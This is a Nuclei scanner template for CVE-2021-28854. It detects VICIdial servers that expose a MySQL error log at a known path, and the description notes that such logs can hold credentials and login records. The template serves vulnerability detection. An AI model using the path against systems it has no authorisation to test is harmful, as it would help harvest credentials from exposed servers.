40 lines
1.0 KiB
YAML
40 lines
1.0 KiB
YAML
id: CVE-2021-28854
|
|
|
|
info:
|
|
name: VICIdial Sensitive Information Disclosure
|
|
author: pdteam
|
|
severity: high
|
|
description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug
|
|
information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial
|
|
systems.
|
|
reference:
|
|
- https://github.com/JHHAX/VICIdial
|
|
classification:
|
|
cve-id: CVE-2021-28854
|
|
tags: cve,cve2021
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/agc/vicidial_mysqli_errors.txt"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'text/plain'
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- 'vdc_db_query'
|
|
part: body
|
|
|
|
# Enhanced by mp on 2022/04/06
|